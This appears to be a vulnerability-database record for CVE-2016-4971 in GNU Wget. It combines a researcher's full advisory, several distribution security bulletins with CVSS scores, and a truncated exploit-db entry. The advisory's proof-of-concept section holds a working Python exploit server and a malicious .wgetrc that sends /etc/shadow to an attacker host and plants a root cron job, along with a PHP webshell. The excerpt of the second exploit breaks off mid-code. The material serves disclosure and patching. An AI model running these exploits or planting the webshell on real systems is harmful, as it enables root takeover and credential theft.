sites easy\n\"\n\nhttps://www.gnu.org/software/wget/\n\n\nIII. INTRODUCTION\n-------------------------\n\nGNU Wget before 1.18 when supplied with a malicious URL (to a malicious or \ncompromised web server) can be tricked into saving an arbitrary remote file \nsupplied by an attacker, with arbitrary contents and filename under \nthe current directory and possibly other directories by writing to .wgetrc.\nDepending on the context in which wget is used, this can lead to remote code \nexecution and even root privilege escalation if wget is run via a root cronjob \nas is often the case in many web application deployments. \nThe vulnerability could also be exploited by well-positioned attackers within\nthe network who are able to intercept/modify the network traffic.\n\n\nIV. DESCRIPTION\n-------------------------\n\nBecause of lack of sufficient controls in wget, when user downloads a file \nwith wget, such as:\n\nwget http://attackers-server/safe_file.txt\n\nan attacker who controls the server could make wget create an arbitrary file\nwith an arbitrary contents and filename by issuing a crafted HTTP 30X Redirect \ncontaining FTP server reference in response to the victim's wget request. \n\nFor example, if the attacker's server replies with the following response:\n\nHTTP/1.1 302 Found\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nLocation: ftp://attackers-server/.bash_profile\nContent-Length: 262\nServer: Apache\n\nwget will automatically follow the redirect and will download a malicious\n.bash_profile file from a malicious FTP server. \nIt will fail to rename the file to the originally requested filename of \n'safe_file.txt' as it would normally do, in case of a redirect to another \nHTTP resource with a different name. \n\nBecause of this vulnerability, an attacker is able to upload an arbitrary file\nwith an arbitrary filename to the victim's current directory.\n\nExecution flow:\n\nvictim@trusty:~$ wget --version | head -n1\nGNU Wget 1.17 built on linux-gnu.\n\nvictim@trusty:~$ pwd\n/home/victim\n\nvictim@trusty:~$ ls\nvictim@trusty:~$ \n\nvictim@trusty:~$ wget http://attackers-server/safe-file.txt\nResolving attackers-server... 192.168.57.1\nConnecting to attackers-server|192.168.57.1|:80... connected.\nHTTP request sent, awaiting response... 302 Found\nLocation: ftp://192.168.57.1/.bash_profile [following]\n => \u00e2\u20ac\u02dc.bash_profile\u00e2\u20ac\u2122\nConnecting to 192.168.57.1:21... connected.\nLogging in as anonymous ... Logged in!\n==> SYST ... done. ==> PWD ... done.\n==> TYPE I ... done. ==> CWD not needed.\n==> SIZE .bash_profile ... 55\n==> PASV ... done. ==> RETR .bash_profile ... done.\nLength: 55 (unauthoritative)\n\n.bash_profile 100%[=============================================================================================>] 55 --.-KB/s in 0s\n\n2016-02-19 04:50:37 (1.27 MB/s) - \u00e2\u20ac\u02dc.bash_profile\u00e2\u20ac\u2122 saved [55]\n\n\nvictim@trusty:~$ ls -l\ntotal 4\n-rw-rw-r-- 1 victim victim 55 Feb 19 04:50 .bash_profile\nvictim@trusty:~$ \n\n\nThis vulnerability will not work if extra options that force destination\nfilename are specified as a paramter. Such as: -O /tmp/output\nIt is however possible to exploit the issue with mirroring/recursive options\nenabled such as -r or -m.\n\nAnother limitation is that attacker exploiting this vulnerability can only\nupload his malicious file to the current directory from which wget was run, \nor to a directory specified by -P option (directory_prefix option).\nThis could however be enough to exploit wget run from home directory, or\nwithin web document root (in which case attacker could write malicious php files\nor .bash_profile files).\n\nThe current directory limitation could also be bypassed by uploading a .wgetrc \nconfig file if wget was run from a home directory.\n\nBy saving .wgetrc in /home/victim/.wgetrc an attacker could set arbitrary wget\nsettings such as destination directory for all downloaded files in future,\nas well as set a proxy setting to make future requests go through a malicious \nproxy server belonging to the attackers to which they could send further \nmalicious responses.\n\n\nHere is a set of Wget settings that can be helpful to an attacker:\n\ndir_prefix = string\n\tTop of directory tree\u00e2\u20ac\u201dthe same as \u00e2\u20ac\u02dc-P string\u00e2\u20ac\u2122.\n\npost_file = file\n\tUse POST as the method for all HTTP requests and send the contents of file in the request body. The same as \u00e2\u20ac\u02dc--post-file=file\u00e2\u20ac\u2122.\n\nrecursive = on/off\n\tRecursive on/off\u00e2\u20ac\u201dthe same as \u00e2\u20ac\u02dc-r\u00e2\u20ac\u2122.\n\ntimestamping = on/off\n\tAllows to overwrite existing files.\n\ncut_dirs = n\n\tIgnore n remote directory components. Allows attacker to create directories with wget (when combined with recursive option).\n\nhttp_proxy \n\tHTTP Proxy server\n\nhttps_proxy \n\tHTTPS Proxy server\n\noutput_document = file\n\tSet the output filename\u00e2\u20ac\u201dthe same as \u00e2\u20ac\u02dc-O file\u00e2\u20ac\u2122.\n\ninput = file\n\tRead the URLs from string, like \u00e2\u20ac\u02dc-i file\u00e2\u20ac\u2122.\n\nmetalink-over-http\n\tIssues HTTP HEAD request instead of GET and extracts Metalink metadata from response headers. \n Then it switches to Metalink download. If no valid Metalink metadata is found, it falls back to ordinary HTTP download.\n\n\n\nFull list of .wgetrc options can be found in:\n\nhttps://www.gnu.org/software/wget/manual/wget.html#Wgetrc-Commands\n\n\n\nV. PROOF OF CONCEPT EXPLOIT\n-------------------------\n\n\n1) Cronjob with wget scenario\n\nOften wget is used inside cronjobs. By default cronjobs run within home \ndirectory of the cronjob owner.\nSuch wget cronjobs are commonly used with many applications used to download \nnew version of databases, requesting web scripts that perform scheduled tasks \nsuch as rebuilding indexes, cleaning caches etc. \nHere are a few example tutorials for Wordpress/Moodle/Joomla/Drupal found on \nthe Internet with exploitable wget cronjobs:\n\nhttps://codex.wordpress.org/Post_to_your_blog_using_email\nhttps://docs.moodle.org/2x/ca/Cron\nhttp://www.joomlablogger.net/joomla-tips/joomla-general-tips/how-to-set-up-a-content-delivery-network-cdn-for-your-joomla-site\nhttp://www.zyxware.com/articles/4483/drupal-how-to-add-a-cron-job-via-cpanel\n\nSuch setup could be abused by attackers to upload .bash_profile file through\nwget vulnerability and run commands in the context of the victim user upon \ntheir next log-in. \n\nAs cron runs priodically attackers, could also write out .wgetrc file in the \nfirst response and then write to /etc/cron.d/malicious-cron in the second. \nIf a cronjob is run by root, this would give them an almost instant root code \nexecution.\n\n\nIt is worth noting that if an attacker had access to local network they could \npotentially modify unencrypted HTTP traffic to inject malicious 30X Redirect \nresponses to wget requests.\n\nThis issue could also be exploited by attackers who have already gained \naccess to the server through a web vulnerability to escalate their privileges. \nIn many cases the cron jobs (as in examples above) are set up to request \nvarious web scripts e.g: \nhttp://localhost/clean-cache.php \n\nIf the file was writable by apache, and attacker had access to www-data/apache \naccount, they could modify it to return malicious Location header and exploit \nroot cronjob that runs the wget request in order to escalate their privileges \nto root.\n\n\nFor simplicity we can assume that attacker already has control over the server \nthat the victim sends the request to with wget.\n\nThe root cronjob on the victim server may look as follows:\n\nroot@victim:~# cat /etc/cron.d/update-database\n# Update database file every 2 minutes\n*/2 * * * * root wget -N http://attackers-server/database.db > /dev/null 2>&1\n\n\nIn order to exploit this setup, attacker first prepares a malicious .wgetrc \nand starts an FTP server:\n\nattackers-server# mkdir /tmp/ftptest\nattackers-server# cd /tmp/ftptest\n\nattackers-server# cat <<_EOF_>.wgetrc\npost_file = /etc/shadow\noutput_document = /etc/cron.d/wget-root-shell\n_EOF_\n\nattackers-server# sudo pip install pyftpdlib\nattackers-server# python -m pyftpdlib -p21 -w\n\n\nAt this point attacker can start an HTTP server which will exploit wget by\nsending malicious redirects to the victim wget's requests:\n \n---[ wget-exploit.py ]---\n\n#!/usr/bin/env python\n\n#\n# Wget 1.18 < Arbitrary File Upload Exploit\n# Dawid Golunski\n# dawid( at )legalhackers.com\n#\n# http://legalhackers.com/advisories/Wget-Arbitrary-File-Upload-Vulnerability-Exploit.txt\n#\n# CVE-2016-4971 \n#\n\nimport SimpleHTTPServer\nimport SocketServer\nimport socket;\n\nclass wgetExploit(SimpleHTTPServer.SimpleHTTPRequestHandler):\n def do_GET(self):\n # This takes care of sending .wgetrc\n\n print \"We have a volunteer requesting \" + self.path + \" by GET :)\\n\"\n if \"Wget\" not in self.headers.getheader('User-Agent'):\n\t print \"But it's not a Wget :( \\n\"\n self.send_response(200)\n self.end_headers()\n self.wfile.write(\"Nothing to see here...\")\n return\n\n print \"Uploading .wgetrc via ftp redirect vuln. It should land in /root \\n\"\n self.send_response(301)\n new_path = '%s'%('ftp://anonymous@%s:%s/.wgetrc'%(FTP_HOST, FTP_PORT) )\n print \"Sending redirect to %s \\n\"%(new_path)\n self.send_header('Location', new_path)\n self.end_headers()\n\n def do_POST(self):\n # In here we will receive extracted file and install a PoC cronjob\n\n print \"We have a volunteer requesting \" + self.path + \" by POST :)\\n\"\n if \"Wget\" not in self.headers.getheader('User-Agent'):\n\t print \"But it's not a Wget :( \\n\"\n self.send_response(200)\n self.end_headers()\n self.wfile.write(\"Nothing to see here...\")\n return\n\n content_len = int(self.headers.getheader('content-length', 0))\n post_body = self.rfile.read(content_len)\n print \"Received POST from wget, this should be the extracted /etc/shadow file: \\n\\n---[begin]---\\n %s \\n---[eof]---\\n\\n\" % (post_body)\n\n print \"Sending back a cronjob script as a thank-you for the file...\" \n print \"It should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response)\"\n self.send_response(200)\n self.send_header('Content-type', 'text/plain')\n self.end_headers()\n self.wfile.write(ROOT_CRON)\n\n print \"\\nFile was served. Check on /root/hacked-via-wget on the victim's host in a minute! :) \\n\"\n\n return\n\nHTTP_LISTEN_IP = '192.168.57.1'\nHTTP_LISTEN_PORT = 80\nFTP_HOST = '192.168.57.1'\nFTP_PORT = 21\n\nROOT_CRON = \"* * * * * root /usr/bin/id > /root/hacked-via-wget \\n\"\n\nhandler = SocketServer.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit)\n\nprint \"Ready? Is your FTP server running?\"\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nresult = sock.connect_ex((FTP_HOST, FTP_PORT))\nif result == 0:\n print \"FTP found open on %s:%s. Let's go then\\n\" % (FTP_HOST, FTP_PORT)\nelse:\n print \"FTP is down :( Exiting.\"\n exit(1)\n\nprint \"Serving wget exploit on port %s...\\n\\n\" % HTTP_LISTEN_PORT\n\nhandler.serve_forever()\n\n\n---[ eof ]---\n\n\n\nAttacker can run wget-exploit.py and wait a few minutes until the victim's server executes\nthe aforementioned cronjob with wget.\n\nThe output should look similar to:\n\n\n---[ wget-exploit.py output ]---\n\nattackers-server# python ./wget-exploit.py \n\nReady? Is your FTP server running?\nFTP found open on 192.168.57.1:21. Let's go then\n\nServing wget exploit on port 80...\n\n\nWe have a volunteer requesting /database.db by GET :)\n\nUploading .wgetrc via ftp redirect vuln. It should land in /root \n\n192.168.57.10 - - [26/Feb/2016 15:03:54] \"GET /database.db HTTP/1.1\" 301 -\nSending redirect to ftp://anonymous@192.168.57.1:21/.wgetrc \n\nWe have a volunteer requesting /database.db by POST :)\n\nReceived POST from wget, this should be the extracted /etc/shadow file: \n\n---[begin]---\nroot:$6$FsAu5RlS$b2J9GDm.....cut......9P19Nb./Y75nypB4FXXzX/:16800:0:99999:7:::\ndaemon:*:16484:0:99999:7:::\nbin:*:16484:0:99999:7:::\nsys:*:16484:0:99999:7:::\nsync:*:16484:0:99999:7:::\ngames:*:16484:0:99999:7:::\nman:*:16484:0:99999:7:::\nlp:*:16484:0:99999:7:::\n...cut...\n---[eof]---\n\nSending back a cronjob script as a thank-you for the file...\nIt should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response)\n192.168.57.10 - - [26/Feb/2016 15:05:54] \"POST /database.db HTTP/1.1\" 200 -\n\nFile was served. Check on /root/hacked-via-wget on the victim's host in a minute! :) \n\n---[ output eof ]---\n\n\nAs we can see .wgetrc got uploaded by the exploit. It has set the post_file\nsetting to /etc/shadow.\nTherefore, on the next wget run, wget sent back shadow file to the attacker.\nIt also saved the malicious cronjob script (ROOT_CRON variable) which should \ncreate a file named /root/hacked-via-wget, which we can verify on the victim's \nserver:\n\n\nroot@victim:~# cat /etc/cron.d/wget-root-shell \n* * * * * root /usr/bin/id > /root/hacked-via-wget \n\nroot@victim:~# cat /root/hacked-via-wget \nuid=0(root) gid=0(root) groups=0(root)\n\n\n\n2) PHP web application scenario\n\nIf wget is used within a PHP script e.g.:\n\n<?php\n\n// Update geoip data\n\n system(\"wget -N -P geoip http://attackers-host/goeip.db\");\t\n\n?>\n\nAn attacker who manages to respond to the request could simply upload a PHP\nbackdoor of:\n\n<?php\n\t//webshell.php\n\n\tsystem($_GET['cmd']);\n?>\n\nby using the wget-exploit script described in example 1.\n\nAfter the upload he could simply execute the script and their shell\ncommand by a GET request to:\n\nhttp://victims-php-host/geoip/webshell.php?cmd=id\n\n\nVI. BUSINESS IMPACT\n-------------------------\n\nAffected versions of wget that connect to untrusted (or compromised) web \nservers could be tricked into uploading a file under an arbitrary name, or\neven path (if wget is run from a home directory).\nDepending on the context in which wget is used, this could lead to\nuploading a web shell and granting the attacker access remote access to the\nsystem, or privilege escalation. It could be possible for attackers to escalate\nto root user if wget is run via root cronjob as it is often the case in web \napplication deployments and is recommended in some guides on the Internet.\n\nThe vulnerability could also be exploited by well-positioned attackers within\nthe networ who are able to intercept/modify the network traffic.\n\n \nVII. SYSTEMS AFFECTED\n-------------------------\n\nAll versions of Wget before the patched version of 1.18 are affected.\n \nVIII. SOLUTION\n-------------------------\n\nUpdate to wget version 1.18 as advertised by the vendor at:\n\nhttp://lists.gnu.org/archive/html/info-gnu/2016-06/msg00004.html\n\nLinux distributions should update their wget packages. It is recommended\nto update wget manually if an updated package is not available for your\ndistribution.\n \nIX. REFERENCES\n-------------------------\n\nhttp://legalhackers.com\n\nhttp://legalhackers.com/advisories/Wget-Arbitrary-File-Upload-Vulnerability-Exploit.txt\n\nhttp://lists.gnu.org/archive/html/info-gnu/2016-06/msg00004.html\n\nhttp://www.ubuntu.com/usn/usn-3012-1/\n\nhttps://bugzilla.redhat.com/show_bug.cgi?id=1343666#c1\n\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4971\n\nX. CREDITS\n-------------------------\n\nThe vulnerability has been discovered by Dawid Golunski\ndawid (at) legalhackers (dot) com\nlegalhackers.com\n \nXI. REVISION HISTORY\n-------------------------\n\n06.07.2016 - Advisory released\n \nXII. LEGAL NOTICES\n-------------------------\n\nThe information contained within this advisory is supplied \"as-is\" with\nno warranties or guarantees of fitness of use or otherwise. I accept no\nresponsibility for any damage caused by the use or misuse of this information.", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "freebsd": [{"lastseen": "2022-01-19T15:51:32", "description": "\n\nGiuseppe Scrivano reports:\n\nOn a server redirect from HTTP to a FTP resource, wget would trust the\n\t HTTP server and uses the name in the redirected URL as the destination\n\t filename.\n\n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-06-09T00:00:00", "type": "freebsd", "title": "wget -- HTTP to FTP redirection file name confusion vulnerability", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2016-06-09T00:00:00", "id": "6DF56C60-3738-11E6-A671-60A44CE6887B", "href": "https://vuxml.freebsd.org/freebsd/6df56c60-3738-11e6-a671-60a44ce6887b.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "debian": [{"lastseen": "2021-11-30T16:45:05", "description": "Package : wget\nVersion : 1.13.4-3+deb7u3\nCVE ID : CVE-2016-4971\nDebian Bug : 827003\n\nOn a server redirect from HTTP to a FTP resource, wget would trust\nthe HTTP server and uses the name in the redirected URL as the\ndestination filename.\nThis behaviour was changed and now it works similarly as a redirect\nfrom HTTP to another HTTP resource so the original name is used as\nthe destination file. To keep the previous behaviour the user must\nprovide --trust-server-names.\n\nFor Debian 7 "Wheezy", these problems have been fixed in version\n1.13.4-3+deb7u3.\n\nWe recommend that you upgrade your wget packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-06-30T20:12:28", "type": "debian", "title": "[SECURITY] [DLA 536-1] wget security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2016-06-30T20:12:28", "id": "DEBIAN:DLA-536-1:51225", "href": "https://lists.debian.org/debian-lts-announce/2016/06/msg00037.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "archlinux": [{"lastseen": "2016-09-02T18:44:41", "description": "GNU Wget when supplied with a malicious website link can be tricked\ninto saving an arbitrary remote file supplied by an attacker, with\narbitrary content and filename under the current directory. This can\nlead to potential code execution by creating system scripts (such as\n.bash_profile and others) within home directory as well as other\nunauthorized actions (such as request sniffing by proxy modification,\nor arbitrary system file retrieval) by uploading .wgetrc configuration\nfile.\nBecause of this vulnerability, an attacker is able to overwrite an\narbitrary file in the victim's current directory.", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-06-20T00:00:00", "type": "archlinux", "title": "wget: arbitrary file overwrite", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2016-06-20T00:00:00", "id": "ASA-201606-19", "href": "https://lists.archlinux.org/pipermail/arch-security/2016-June/000654.html", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "redhat": [{"lastseen": "2021-10-21T04:43:05", "description": "The wget packages provide the GNU Wget file retrieval utility for HTTP, HTTPS, and FTP protocols.\n\nSecurity Fix(es):\n\n* It was found that wget used a file name provided by the server for the downloaded file when following an HTTP redirect to a FTP server resource. This could cause wget to create a file with a different name than expected, possibly allowing the server to execute arbitrary code on the client. (CVE-2016-4971)\n\nRed Hat would like to thank GNU wget project for reporting this issue. Upstream acknowledges Dawid Golunski as the original reporter.\n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat Enterprise Linux 7.3 Release Notes linked from the References section.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-11-03T06:07:15", "type": "redhat", "title": "(RHSA-2016:2587) Moderate: wget security and bug fix update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2018-04-11T23:31:39", "id": "RHSA-2016:2587", "href": "https://access.redhat.com/errata/RHSA-2016:2587", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "debiancve": [{"lastseen": "2022-07-04T06:02:58", "description": "GNU wget before 1.18 allows remote servers to write to arbitrary files by redirecting a request from HTTP to a crafted FTP resource.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-06-30T17:59:00", "type": "debiancve", "title": "CVE-2016-4971", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2016-06-30T17:59:00", "id": "DEBIANCVE:CVE-2016-4971", "href": "https://security-tracker.debian.org/tracker/CVE-2016-4971", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "ubuntu": [{"lastseen": "2023-01-26T13:22:34", "description": "## Releases\n\n * Ubuntu 16.04 ESM\n * Ubuntu 15.10 \n * Ubuntu 14.04 ESM\n * Ubuntu 12.04 \n\n## Packages\n\n * wget \\- retrieves files from the web\n\nDawid Golunski discovered that Wget incorrectly handled filenames when \nbeing redirected from an HTTP to an FTP URL. A malicious server could \npossibly use this issue to overwrite local files.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-06-20T00:00:00", "type": "ubuntu", "title": "Wget vulnerability", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2016-06-20T00:00:00", "id": "USN-3012-1", "href": "https://ubuntu.com/security/notices/USN-3012-1", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "cve": [{"lastseen": "2023-02-02T23:31:46", "description": "It was found that wget used a file name provided by the server for the downloaded file when following a HTTP redirect to a FTP server resource. This could cause wget to create a file with a different name than expected, possibly allowing the server to execute arbitrary code on the client.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-06-30T17:59:00", "type": "cve", "title": "CVE-2016-4971", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2023-02-02T21:16:00", "cpe": ["cpe:/o:paloaltonetworks:pan-os:6.1.16", "cpe:/o:paloaltonetworks:pan-os:7.1.9", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:paloaltonetworks:pan-os:7.0.14", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:canonical:ubuntu_linux:15.10", "cpe:/o:oracle:solaris:10", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:oracle:solaris:11.3"], "id": "CVE-2016-4971", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4971", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:o:oracle:solaris:10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:esm:*:*:*", "cpe:2.3:o:paloaltonetworks:pan-os:7.0.14:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:solaris:11.3:*:*:*:*:*:*:*", "cpe:2.3:o:paloaltonetworks:pan-os:6.1.16:*:*:*:*:*:*:*", "cpe:2.3:o:paloaltonetworks:pan-os:7.1.9:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:15.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:-:*:*:*"]}], "exploitdb": [{"lastseen": "2022-08-16T06:05:03", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-04-30T00:00:00", "type": "exploitdb", "title": "GNU Wget < 1.18 - Arbitrary File Upload (2)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["2016-4971", "CVE-2016-4971"], "modified": "2021-04-30T00:00:00", "id": "EDB-ID:49815", "href": "https://www.exploit-db.com/exploits/49815", "sourceData": "# Exploit Title: GNU Wget < 1.18 - Arbitrary File Upload / Remote Code Execution (2)\r\n# Original Exploit Author: Dawid Golunski\r\n# Exploit Author: liewehacksie\r\n# Version: GNU Wget < 1.18 \r\n# CVE: CVE-2016-4971\r\n\r\nimport http.server\r\nimport socketserver\r\nimport socket\r\nimport sys\r\n\r\nclass wgetExploit(http.server.SimpleHTTPRequestHandler):\r\n\r\n def do_GET(self):\r\n # This takes care of sending .wgetrc/.bash_profile/$file\r\n\r\n print(\"We have a volunteer requesting \" + self.path 